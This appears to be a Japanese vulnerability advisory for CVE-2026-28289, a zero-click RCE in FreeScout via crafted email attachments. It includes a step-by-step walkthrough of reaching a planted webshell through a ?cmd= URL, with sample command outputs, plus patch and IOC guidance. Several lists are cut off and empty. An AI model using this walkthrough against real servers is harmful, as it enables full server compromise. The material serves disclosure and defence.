
CVE-2026-28289

メール添付ファイルのバイパスによる FreeScout のゼロクリック未認証 RCE
CVE-2026-28289(通称 Mail2Shell)は、FreeScout に影響を及ぼす重大なゼロクリックのリモートコード実行 (RCE) 脆弱性です。
攻撃者は、特別に細工したメールを FreeScout のメールボックスに送信するだけで、認証もユーザーの操作も一切なしに、基盤となるサーバーへのリモートシェルアクセスを獲得できます。
攻撃者は、特別に細工された添付ファイル付きのメールを送信します。
FreeScout は .htaccess などの危険なファイルをブロックしようとしますが、攻撃者は以下の方法で回避します:
攻撃者は、アップロードされたファイルへ Web パス経由でアクセスし、任意のコマンドを実行します。
結果:
# Remote shell access achieved
whoami
www-data
✅ Email sent successfully! (Zero-Click RCE triggered)
次のステップの手順も併せて表示されます。
find コマンドを実行した場合アップロードされたファイルの完全な実パスが即座に返されます。例:
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt
(または類似の日時フォルダ — FreeScout が添付ファイルを自動保存したことが確認できます)。
ステップ 2 のパスをコピーして、次の URL を開いてください:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami
正確に次の出力が表示されます (プレーンテキスト):
www-data
(または、サーバー上の Apache/PHP ユーザーの名前 — 通常は www-data、apache、nobody のいずれか)。
次にコマンドを変更してリロードしてください:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id
表示される内容:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
そして、ls -la の場合は:
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar 5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar 5 14:00 ..
-rw-r--r-- 1 www-data www-data 87 Mar 5 15:00 webshell.txt
この出力は、ブラウザページに直接表示されます (ウェブシェルの <pre> タグ内)。エラーも、PHP ソースコードも、404 も発生しません。
これは、サーバー上で完全なリモートコード実行が可能になったことを意味します — .htaccess + ゼロ幅スペースのバイパスが完璧に機能し、メール添付ファイルがユーザー操作なしで処理されました。
FreeScout の全バージョン:
<= 1.8.206
直ちに以下へアップグレードしてください:
1.8.207 or later
AllowOverride All を無効にする以下に注意してください:
.htaccess ファイル/storage/attachments/ への直接アクセスの試み侵害の指標 (IOC) には、次のようなものが含まれる可能性があります:
.htaccess ファイルEmail → Malicious Attachment (Unicode prefixed filename)
↓
Saved to predictable path
↓
Web-accessible execution
↓
Remote shell
この問題は、以下で追加された保護をバイパスします:
不完全なファイル名サニタイズロジックを示しています。
| リスク領域 | 影響 |
|---|---|
| 機密性 | 🔴 高 |
| 完全性 | 🔴 高 |
| 可用性 | 🔴 高 |
セルフホスト型の FreeScout インスタンスを運用している場合:
🔥 直ちにパッチを適用してください。 💡 インターネットに公開された脆弱なバージョンを運用している場合は、侵害されているものと想定してください。 🛡 ログのレビューと整合性チェックを実施してください。
| フィールド | 値 |
|---|
| CVE ID | CVE-2026-28289 |
| 深刻度 | 🔴 重大 |
| CVSS | 10.0 (最大) |
| 攻撃ベクトル | リモート (メール) |
| 認証の必要性 | ❌ 不要 |
| ユーザー操作 | ❌ 不要 |
| 影響 | サーバー完全侵害 |